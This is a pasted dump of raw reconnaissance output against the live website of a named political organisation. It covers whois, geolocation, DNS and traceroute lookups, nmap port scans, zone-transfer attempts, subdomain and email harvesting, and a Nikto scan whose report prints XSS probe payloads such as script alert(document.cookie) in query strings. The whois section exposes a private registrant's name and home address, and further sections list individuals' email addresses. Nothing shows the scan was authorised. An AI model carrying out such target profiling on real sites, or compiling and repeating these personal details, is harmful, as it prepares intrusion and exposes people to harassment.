Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- =======================================================================================================================================
- Hostname hizb-ut-tahrir.dk ISP Zitcom A/S
- Continent Europe Flag
- DK
- Country Denmark Country Code DK
- Region Unknown Local time 30 Jan 2019 01:39 CET
- City Unknown Postal Code Unknown
- IP Address 93.191.156.145 Latitude 55.712
- Longitude 12.056
- =======================================================================================================================================
- #######################################################################################################################################
- > hizb-ut-tahrir.dk
- Server: 27.50.70.139
- Address: 27.50.70.139#53
- Non-authoritative answer:
- Name: hizb-ut-tahrir.dk
- Address: 93.191.156.145
- >
- #######################################################################################################################################
- HostIP:93.191.156.145
- HostName:hizb-ut-tahrir.dk
- Gathered Inet-whois information for 93.191.156.145
- ---------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 93.191.156.0 - 93.191.156.255
- netname: ACL-2342
- descr: ZITCOM A/S
- country: DK
- org: ORG-ZA59-RIPE
- admin-c: ZIN4-RIPE
- tech-c: ZIN4-RIPE
- status: ASSIGNED PA
- mnt-by: ZITCOM-MNT
- created: 2018-01-03T12:40:00Z
- last-modified: 2018-01-03T12:41:38Z
- source: RIPE # Filtered
- organisation: ORG-ZA59-RIPE
- org-name: Zitcom A/S
- org-type: LIR
- address: H�jvangen 4
- address: 8660
- address: Skanderborg
- address: DENMARK
- phone: +4570235566
- fax-no: +4570235567
- admin-c: FBH16-RIPE
- admin-c: MHV24-RIPE
- admin-c: AS48854-RIPE
- abuse-c: ZIN4-RIPE
- mnt-ref: RIPE-NCC-HM-MNT
- mnt-ref: ZITCOM-MNT
- mnt-by: RIPE-NCC-HM-MNT
- mnt-by: ZITCOM-MNT
- created: 2010-08-27T09:23:04Z
- last-modified: 2017-09-06T16:36:03Z
- source: RIPE # Filtered
- role: Zitcom IP Network
- address: H�jvangen 4
- address: Skanderborg 8660
- address: Denmark
- phone: +45 70235566
- remarks: *********************************************
- remarks: Do NOT send abuse reports to any other
- remarks: address EXCEPT abuse@zitcom.dk
- remarks: **********************************************
- remarks: Network Operation Center +45 70 23 55 66
- remarks: Routing issue <noc@zitcom.dk>
- admin-c: MHV24-RIPE
- admin-c: FBH16-RIPE
- admin-c: AS48854-RIPE
- tech-c: MHV24-RIPE
- tech-c: FBH16-RIPE
- tech-c: AS48854-RIPE
- nic-hdl: ZIN4-RIPE
- mnt-by: ZITCOM-MNT
- created: 2010-08-31T10:44:11Z
- last-modified: 2018-04-10T20:14:16Z
- source: RIPE # Filtered
- abuse-mailbox: abuse@zitcom.dk
- % Information related to '93.191.156.0/24AS48854'
- route: 93.191.156.0/24
- descr: ZITCOM A/S
- origin: AS48854
- mnt-by: zitcom-mnt
- created: 2015-04-08T12:49:58Z
- last-modified: 2015-04-08T12:49:58Z
- source: RIPE
- % This query was served by the RIPE Database Query Service version 1.92.6 (ANGUS)
- Gathered Inic-whois information for hizb-ut-tahrir.dk
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain: hizb-ut-tahrir.dk
- DNS: hizb-ut-tahrir.dk
- Registered: 1999-08-05
- Expires: 2019-09-30
- Registration period: 1 year
- VID: no
- Dnssec: Unsigned delegation
- Status: Active
- Nameservers
- Hostname: ns1.unoeuro.com
- Hostname: ns2.unoeuro.com
- Hostname: ns3.unoeuro.com
- Hostname: ns4.unoeuro.com
- # Use option --show-handles to get handle information.
- # Whois HELP for more help.
- Gathered Netcraft information for hizb-ut-tahrir.dk
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for hizb-ut-tahrir.dk
- Netcraft.com Information gathered
- Gathered Subdomain information for hizb-ut-tahrir.dk
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.hizb-ut-tahrir.dk
- HostIP:93.191.156.145
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host hizb-ut-tahrir.dk, Searched 0 pages containing 0 results
- Gathered E-Mail information for hizb-ut-tahrir.dk
- ---------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host hizb-ut-tahrir.dk, Searched 0 pages containing 0 results
- Gathered TCP Port information for 93.191.156.145
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 80/tcp open
- Portscan Finished: Scanned 150 ports, 3 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://hizb-ut-tahrir.dk
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title:
- [+] IP address: 93.191.156.145
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- =======================================================================================================================================
- # Hello 2600:3c03::f03c:91ff:fe7a:dffa. Your session has been logged.
- #
- # Copyright (c) 2002 - 2019 by DK Hostmaster A/S
- #
- # Version: 2.0.2
- #
- # The data in the DK Whois database is provided by DK Hostmaster A/S
- # for information purposes only, and to assist persons in obtaining
- # information about or related to a domain name registration record.
- # We do not guarantee its accuracy. We will reserve the right to remove
- # access for entities abusing the data, without notice.
- #
- # Any use of this material to target advertising or similar activities
- # are explicitly forbidden and will be prosecuted. DK Hostmaster A/S
- # requests to be notified of any such activities or suspicions thereof.
- Domain: hizb-ut-tahrir.dk
- DNS: hizb-ut-tahrir.dk
- Registered: 1999-08-05
- Expires: 2019-09-30
- Registration period: 1 year
- VID: no
- Dnssec: Unsigned delegation
- Status: Active
- Registrant
- Handle: MJ7736-DK
- Name: Mulie Langberg Jaw
- Address: Tømrergade 6,1 tv
- Postalcode: 2200
- City: København N
- Country: DK
- Administrator
- Handle: MJ7736-DK
- Name: Mulie Langberg Jaw
- Address: Tømrergade 6,1 tv
- Postalcode: 2200
- City: København N
- Country: DK
- Nameservers
- Hostname: ns1.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns2.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns3.unoeuro.com
- Handle: UA1074-DK
- Hostname: ns4.unoeuro.com
- Handle: UA1074-DK
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 93.191.156.145
- [i] Country: Denmark
- [i] State:
- [i] City:
- [i] Latitude: 55.7123
- [i] Longitude: 12.0564
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 406 Not Acceptable
- [i] Date: Wed, 30 Jan 2019 01:00:29 GMT
- [i] Content-Length: 102
- [i] Content-Type: text/html; charset=iso-8859-1
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- hizb-ut-tahrir.dk. 3599 IN A 93.191.156.145
- hizb-ut-tahrir.dk. 3599 IN NS ns1.unoeuro.com.
- hizb-ut-tahrir.dk. 3599 IN NS ns2.unoeuro.com.
- hizb-ut-tahrir.dk. 3599 IN NS ns3.unoeuro.com.
- hizb-ut-tahrir.dk. 3599 IN NS ns4.unoeuro.com.
- hizb-ut-tahrir.dk. 14399 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2018102500 14400 3600 1209600 3600
- hizb-ut-tahrir.dk. 3599 IN MX 10 mx.unoeuro.com.
- hizb-ut-tahrir.dk. 3599 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 93.191.156.145
- Network = 93.191.156.145 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 93.191.156.145 - 93.191.156.145 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2019-01-30 01:00 UTC
- Nmap scan report for hizb-ut-tahrir.dk (93.191.156.145)
- Host is up (0.10s latency).
- rDNS record for 93.191.156.145: linux260.unoeuro.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
- #######################################################################################################################################
- [?] Enter the target: example( http://domain.com )
- http://hizb-ut-tahrir.dk/
- [!] IP Address : 93.191.156.145
- [!] CMS Detected : WordPress
- [?] Would you like to use WPScan? [Y/n] Y
- Scan Aborted: invalid option: --random-agent
- [+] Honeypot Probabilty: 0%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for hizb-ut-tahrir.dk
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/hizb-ut-tahrir.dk
- ---------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns2.unoeuro.com. (93.191.156.2) AS48854 Zitcom A/S Denmark
- ns3.unoeuro.com. (83.217.78.186) AS34762 Sentia N.V. Belgium
- ns1.unoeuro.com. (46.36.215.2) AS207199 Zitcom A/S Denmark
- ns4.unoeuro.com. (85.159.211.233) AS63949 Linode, LLC United Kingdom
- [+] MX Records
- 10 (94.231.103.108) AS48854 Zitcom A/S Denmark
- [+] Host Records (A)
- www.hizb-ut-tahrir.dk (linux260.unoeuro.com) (93.191.156.145) AS48854 Zitcom A/S Denmark
- [+] TXT Records
- "v=spf1 include:spf.unoeuro.com ?all"
- [+] DNS Map: https://dnsdumpster.com/static/map/hizb-ut-tahrir.dk.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- info@hizb-ut-tahrir.dk
- pixel-1548810051664078-web-@hizb-ut-tahrir.dk
- pixel-1548810054527870-web-@hizb-ut-tahrir.dk
- [+] Hosts found in search engines:
- ---------------------------------------------------------------------------------------------------------------------------------------
- [-] Resolving hostnames IPs...
- 93.191.156.145:292301-www.hizb-ut-tahrir.dk
- 93.191.156.145:2F292301-www.hizb-ut-tahrir.dk
- 93.191.156.145:www.hizb-ut-tahrir.dk
- [+] Virtual hosts:
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P1-1-Debian <<>> hizb-ut-tahrir.dk
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39158
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;hizb-ut-tahrir.dk. IN A
- ;; ANSWER SECTION:
- hizb-ut-tahrir.dk. 1396 IN A 93.191.156.145
- ;; Query time: 359 msec
- ;; SERVER: 27.50.70.139#53(27.50.70.139)
- ;; WHEN: mar jan 29 21:16:56 EST 2019
- ;; MSG SIZE rcvd: 62
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P1-1-Debian <<>> +trace hizb-ut-tahrir.dk
- ;; global options: +cmd
- . 80445 IN NS c.root-servers.net.
- . 80445 IN NS d.root-servers.net.
- . 80445 IN NS h.root-servers.net.
- . 80445 IN NS k.root-servers.net.
- . 80445 IN NS e.root-servers.net.
- . 80445 IN NS g.root-servers.net.
- . 80445 IN NS l.root-servers.net.
- . 80445 IN NS m.root-servers.net.
- . 80445 IN NS j.root-servers.net.
- . 80445 IN NS i.root-servers.net.
- . 80445 IN NS f.root-servers.net.
- . 80445 IN NS b.root-servers.net.
- . 80445 IN NS a.root-servers.net.
- . 80445 IN RRSIG NS 8 0 518400 20190211170000 20190129160000 16749 . pDvhof1Qq3BIPv/R7RZEVOcqXxufNPRLMC7w622YEMv/8yOaSm50jfFe dLM4Ay8eP+/6RcvyjJOVlS61syQtNVP5ErTTsc2oyBp9bNZNBhPk0OBs 6cDzTYewhJj/ckNL0V7VDboUjr4wd/FsB5RK4ZGIRr44CxjL6FdJ7iaD A360PZonDi7oI0g77VOiDYzPB5tS4T9N3dQWtxndFc5++yVH9gnINRyZ s2Mw83DMyJDgZh25RS5W6Ev/Oo1EsSYUFdG3elX0/1NPVauecOna4pQ0 mThOMX2ZS1MCdCCjq/cRn6pKaJHr8Jibz0ks++b3EHQH1kwQN0dL8eAL b2OL5g==
- ;; Received 525 bytes from 27.50.70.139#53(27.50.70.139) in 355 ms
- dk. 172800 IN NS a.nic.dk.
- dk. 172800 IN NS b.nic.dk.
- dk. 172800 IN NS c.nic.dk.
- dk. 172800 IN NS l.nic.dk.
- dk. 172800 IN NS p.nic.dk.
- dk. 172800 IN NS s.nic.dk.
- dk. 86400 IN DS 32195 8 2 167CB3652048F478222E958D1CAD907D7ECB28E7A545DE01B8591AD2 9EAC6444
- dk. 86400 IN RRSIG DS 8 1 86400 20190211170000 20190129160000 16749 . ZTRSe/z0A926yKpZYtD5F2RuCKdv04x6ZloZWUOoIJ2u3xL1QGQvdye4 +nYkfqcthJ41Q/uXqvM9WfldbkgUXa9ZlBAsO2jpH7nuOCPm5akDLMyg wZz7iyyZJha907llxIyQe5Sd9BhkpfLWCLjxcqfssQcZ8EgL02vxGxLg 9ieOzDOIpUKvfEDvUgcPyZPOznYSzBV/Zd3T+SXmShgBEULJ4LpcgpzP eD6HS0gLM7W1743dYlPR5ktAi329RxlaoMmXeQQTBdY3ql673bcBEsC4 7ila+Y6K6eSMTmzXxkmivNeexK9YdPV+lrUomF1zA7297q4uqtpQJ6Ib QuJo3A==
- ;; Received 717 bytes from 192.5.5.241#53(f.root-servers.net) in 248 ms
- hizb-ut-tahrir.dk. 86400 IN NS ns1.unoeuro.com.
- hizb-ut-tahrir.dk. 86400 IN NS ns2.unoeuro.com.
- hizb-ut-tahrir.dk. 86400 IN NS ns3.unoeuro.com.
- hizb-ut-tahrir.dk. 86400 IN NS ns4.unoeuro.com.
- sr833b94sidck8s7te0nq20kd92bcg8p.dk. 600 IN NSEC3 1 1 17 9729B7160513B7A5 SR8A4TO3M6BPJFFK74AV469LME7QNMLP A NS SOA TXT AAAA RRSIG DNSKEY NSEC3PARAM
- tg1l0h4nsv1es9neq8b2b203vbrnvh3b.dk. 600 IN NSEC3 1 1 17 9729B7160513B7A5 TG28TN2Q0JTLDOMKDHB6A46M44RN48ON NS DS RRSIG
- sr833b94sidck8s7te0nq20kd92bcg8p.dk. 600 IN RRSIG NSEC3 8 2 600 20190226151018 20190129120344 57799 dk. iJ4uCFpFfv5RbkUVYHhRfHMn7YNH1KVqq6XMBc0z8SIgMhi3EPqHPqHK S8uvq+qzZeiN0rNxzondcwY0L5w2MFuOjBB6FpqjKbPJ9ns7Pj6dUHDT ICOtje/IhW44L4Fe6qSr2wmIYYuHNM7t5SDlKMKLw+Qs6GvTiGePgoI0 36/+h8IIJOQMfRzj+6GXk2TriCXFBslsUY5bnSIwiLJ82At77gQPMAwj JHKuLwDCLB93cqLci3nZqTQYBMfaJDoXYAfzgZLZ7BnINyj/5X8bzEnf pX7jM/MuxMzuC7nBHjklkSAONR/59pNIVCHAB8j/2a0AtSUt/cFggpbG LoC7fg==
- tg1l0h4nsv1es9neq8b2b203vbrnvh3b.dk. 600 IN RRSIG NSEC3 8 2 600 20190227052610 20190129220350 57799 dk. dXFZR7wFVuof2YlhmHP3K1D74a/tOjGXdZaLPkEn0StzTZdznaEPfrD7 L/irVfLwyuhGpIRH6ZuJX1QuYOz6TGPpR5Ka8aFQfefm5fp0Ag3met6f YKV9ODzoQmBmQxdG5eWNoGfssHsCk/G+foocuNHz2zVOEjQZpryujS6B DZNdPQ6Z4JjVmFwZsjBAp6qQEy/g1FivHooZOFWEb+rmLB2/BWrCJVz/ nDHhp5ApcfW4PyZanFsznRCEmsnceCArQJQMSaNA0vYWAtRkAyvzNjwP V5sy9Wg2loYZzZKs2Mt7AItzOfs3HJuQXB9Dnj6+iRQj8JAUQFtX68Sn 7IVPIg==
- ;; Received 884 bytes from 2001:678:74::53#53(c.nic.dk) in 39 ms
- hizb-ut-tahrir.dk. 3600 IN A 93.191.156.145
- ;; Received 62 bytes from 46.36.215.2#53(ns1.unoeuro.com) in 496 ms
- #######################################################################################################################################
- Traceroute 'hizb-ut-tahrir.dk '
- ---------------------------------------------------------------------------------------------------------------------------------------
- Start: 2019-01-30T02:19:03+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.201 0.0% 3 0.8 0.8 0.6 1.2 0.3
- 2.|-- 45.79.12.4 0.0% 3 1.0 0.8 0.5 1.0 0.3
- 3.|-- 45.79.12.8 0.0% 3 0.7 2.7 0.7 6.8 3.5
- 4.|-- ix-et-5-1-2-0.tcore1.dt8-dallas.as6453.net 0.0% 3 1.9 1.7 1.2 1.9 0.4
- 5.|-- if-ae-37-3.tcore1.aeq-ashburn.as6453.net 0.0% 3 122.8 122.6 121.9 123.2 0.6
- 6.|-- if-ae-2-2.tcore2.aeq-ashburn.as6453.net 0.0% 3 121.6 121.9 121.6 122.2 0.3
- 7.|-- if-ae-12-2.tcore4.njy-newark.as6453.net 0.0% 3 121.8 122.2 121.8 122.4 0.3
- 8.|-- if-ae-1-3.tcore3.njy-newark.as6453.net 0.0% 3 121.7 122.0 121.6 122.8 0.6
- 9.|-- if-ae-15-2.tcore1.l78-london.as6453.net 0.0% 3 122.0 121.8 121.6 122.0 0.2
- 10.|-- if-ae-3-2.tcore1.pye-paris.as6453.net 0.0% 3 122.1 127.1 122.1 130.8 4.5
- 11.|-- if-ae-11-2.tcore1.pvu-paris.as6453.net 0.0% 3 121.7 121.9 121.6 122.3 0.4
- 12.|-- if-ae-9-3.tcore2.fnm-frankfurt.as6453.net 0.0% 3 120.9 122.5 120.9 124.0 1.5
- 13.|-- 195.219.87.25 0.0% 3 125.4 125.0 124.5 125.4 0.5
- 14.|-- ae1-0.sdnqe10.dk.ip.tdc.net 0.0% 3 137.8 138.2 137.8 138.7 0.5
- 15.|-- cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net 0.0% 3 133.0 133.4 132.4 134.7 1.2
- 16.|-- 212.237.248.7 0.0% 3 137.0 137.6 137.0 138.9 1.1
- 17.|-- vdom1.net.dk2.zitcom.dk 0.0% 3 139.3 136.4 130.5 139.4 5.1
- 18.|-- linux260.unoeuro.com 0.0% 3 140.1 140.1 139.8 140.5 0.4
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: hizb-ut-tahrir.dk
- [!] Wildcard resolution is enabled on this domain
- [!] It is resolving to 93.191.156.145
- [!] All queries will resolve to this address!!
- [-] DNSSEC is not configured for hizb-ut-tahrir.dk
- [*] SOA ns1.unoeuro.com 46.36.215.2
- [*] NS ns4.unoeuro.com 85.159.211.233
- [*] NS ns4.unoeuro.com 2a01:7e00::f03c:91ff:fe50:2326
- [*] NS ns2.unoeuro.com 93.191.156.2
- [*] NS ns3.unoeuro.com 83.217.78.186
- [*] NS ns3.unoeuro.com 2a00:1c98:10:26::10
- [*] NS ns1.unoeuro.com 46.36.215.2
- [*] MX mx.unoeuro.com 94.231.103.108
- [*] A hizb-ut-tahrir.dk 93.191.156.145
- [*] TXT hizb-ut-tahrir.dk v=spf1 include:spf.unoeuro.com ?all
- [*] Enumerating SRV Records
- [*] SRV _autodiscover._tcp.hizb-ut-tahrir.dk maildiscover.unoeuro.com 94.231.108.222 443 10
- [+] 1 Records Found
- ######################################################################################################################################
- [*] Processing domain hizb-ut-tahrir.dk
- [*] Using system resolvers ['27.50.70.139', '38.132.106.139', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
- [+] Getting nameservers
- 85.159.211.233 - ns4.unoeuro.com
- 93.191.156.2 - ns2.unoeuro.com
- 83.217.78.186 - ns3.unoeuro.com
- 46.36.215.2 - ns1.unoeuro.com
- [-] Zone transfer failed
- [+] TXT records found
- "v=spf1 include:spf.unoeuro.com ?all"
- [+] MX records found, added to target list
- 10 mx.unoeuro.com.
- [+] Wildcard domain found - 93.191.156.145
- [*] Scanning hizb-ut-tahrir.dk for A records
- 94.231.108.222 - autoconfig.hizb-ut-tahrir.dk
- 94.231.103.107 - mail.hizb-ut-tahrir.dk
- 94.231.106.220 - smtp.hizb-ut-tahrir.dk
- #######################################################################################################################################
- =======================================================================================================================================
- | External hosts:
- | [+] External Host Found: http://www.islamdevleti.org
- | [+] External Host Found: http://da.wikipedia.org
- | [+] External Host Found: http://www.globalpost.com
- | [+] External Host Found: http://hizb.dk
- | [+] External Host Found: http://www.guardian.co.uk
- | [+] External Host Found: http://archives.dawn.com
- | [+] External Host Found: http://verdenshandel.dk
- | [+] External Host Found: http://economictimes.indiatimes.com
- | [+] External Host Found: http://www.timesonline.co.uk
- | [+] External Host Found: http://www.180grader.dk
- | [+] External Host Found: http://www.ifu.dk
- | [+] External Host Found: http://www.npr.org
- | [+] External Host Found: http://www.berlingske.dk
- | [+] External Host Found: http://www.cdc.gov
- | [+] External Host Found: http://www.nytimes.com
- | [+] External Host Found: http://www.leksikon.org
- | [+] External Host Found: http://www.kristeligt-dagblad.dk
- | [+] External Host Found: http://www.dailystar.com.lb
- | [+] External Host Found: http://eepurl.com
- | [+] External Host Found: https://www.facebook.com
- | [+] External Host Found: http://www.scribd.com
- | [+] External Host Found: http://hizb-ut-tahrir.dk
- | [+] External Host Found: http://connect.facebook.net
- | [+] External Host Found: http://www.faktalink.dk
- | [+] External Host Found: http://www.stm.dk
- | [+] External Host Found: http://www.youtube.com
- | [+] External Host Found: http://edition.cnn.com
- | [+] External Host Found: http://blueimp.github.io
- | [+] External Host Found: http://www.b.dk
- | [+] External Host Found: http://Vwww.nordealivogpension.dk
- | [+] External Host Found: http://www.khilafah.com
- | [+] External Host Found: http://pak-news.net
- | [+] External Host Found: http://www.aerenlund.dk
- | [+] External Host Found: http://thomaswagnernielsen.dk
- | [+] External Host Found: http://www.dr.dk
- | [+] External Host Found: http://www.haaretz.com
- | [+] External Host Found: http://i.pol.dk
- | [+] External Host Found: http://news.bbc.co.uk
- | [+] External Host Found: http://code.jquery.com
- | [+] External Host Found: http://politiken.dk
- | [+] External Host Found: http://www.washingtonpost.com
- | [+] External Host Found: http://www.maannews.net
- | [+] External Host Found: http://www.spapev.org
- | [+] External Host Found: http://www.centreforsocialjustice.www.centreforsocialjustice.org.uk
- | [+] External Host Found: http://www.information.dk
- | [+] External Host Found: http://upload
- =======================================================================================================================================
- | E-mails:
- | [+] E-mail Found: women@hizb-ut-tahrir.info
- | [+] E-mail Found: info@hizb-ut-tahrir.dk
- | [+] E-mail Found: info@hizb-australia.org
- | [+] E-mail Found: chadi@hizb-ut-tahrir.dk
- | [+] E-mail Found: cf@hizb.dk
- =======================================================================================================================================
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 94.231.103.107 alias mail.hizb-ut-tahrir.dk
- 94.231.103.107 host mail.unoeuro.com
- 94.231.106.220 alias smtp.hizb-ut-tahrir.dk
- 94.231.106.220 host asmtp.unoeuro.com
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 93.191.156.145
- + Target Hostname: 93.191.156.145
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /C=DK/postalCode=8660/ST=Jutland/L=Skanderborg/street=Danmarksvej 26/O=UnoEuro Danmark A/S/OU=Hostmaster/OU=PremiumSSL Wildcard/CN=*.unoeuro.com
- Ciphers: TLS_AES_256_GCM_SHA384
- Issuer: /C=GB/ST=Greater Manchester/L=Salford/O=COMODO CA Limited/CN=COMODO RSA Organization Validation Secure Server CA
- + Start Time: 2019-01-29 21:45:18 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Root page / redirects to: http://93.191.156.145/
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Server is using a wildcard certificate: *.unoeuro.com
- + Hostname '93.191.156.145' does not match certificate's names: *.unoeuro.com
- + 7537 requests: 0 error(s) and 6 item(s) reported on remote host
- + End Time: 2019-01-29 22:54:10 (GMT-5) (4132 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- --------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 93.191.156.145
- + Target Hostname: hizb-ut-tahrir.dk
- + Target Port: 80
- + Start Time: 2019-01-29 21:45:28 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + Retrieved x-powered-by header: PHP/5.6.40
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- Illegal hexadecimal digit 'g' ignored at /var/lib/nikto/plugins/nikto_headers.plugin line 106.
- + Server leaks inodes via ETags, header found with file /robots.txt, inode: 263, size: 1443430126000000, mtime: Wed Dec 31 19:00:00 1969
- + "robots.txt" contains 7 entries which should be manually viewed.
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
- + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
- + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
- + /index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-2820: /index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
- + OSVDB-50552: /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
- + /index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >: MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + /index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-50553: /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-38019: /?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-25497: /index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
- + OSVDB-12606: /index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
- + OSVDB-2790: /index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
- + OSVDB-3092: /data/: This might be interesting...
- ---------------------------------------------------------------------------------------------------------------------------------------
- #######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- hizb-ut-tahrir.dk -----
- Host's addresses:
- __________________
- hizb-ut-tahrir.dk. 2324 IN A 93.191.156.145
- Wildcard detection using: ycmhfmdeiklk
- _______________________________________
- ycmhfmdeiklk.hizb-ut-tahrir.dk. 3600 IN A 93.191.156.145
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Wildcards detected, all subdomains will point to the same IP address
- Omitting results containing 93.191.156.145.
- Maybe you are using OpenDNS servers.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Name Servers:
- ______________
- ns1.unoeuro.com. 85143 IN A 46.36.215.2
- ns4.unoeuro.com. 85142 IN A 85.159.211.233
- ns3.unoeuro.com. 85142 IN A 83.217.78.186
- ns2.unoeuro.com. 86366 IN A 93.191.156.2
- Mail (MX) Servers:
- ___________________
- mx.unoeuro.com. 3600 IN A 94.231.103.108
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for hizb-ut-tahrir.dk on ns1.unoeuro.com ...
- Trying Zone Transfer for hizb-ut-tahrir.dk on ns4.unoeuro.com ...
- Trying Zone Transfer for hizb-ut-tahrir.dk on ns3.unoeuro.com ...
- Trying Zone Transfer for hizb-ut-tahrir.dk on ns2.unoeuro.com ...
- brute force file not specified, bay.
- #######################################################################################################################################
- # Hello 2001:18c0:11e:f700:9995:4a3e:722e:4a93. Your session has been logged.
- #
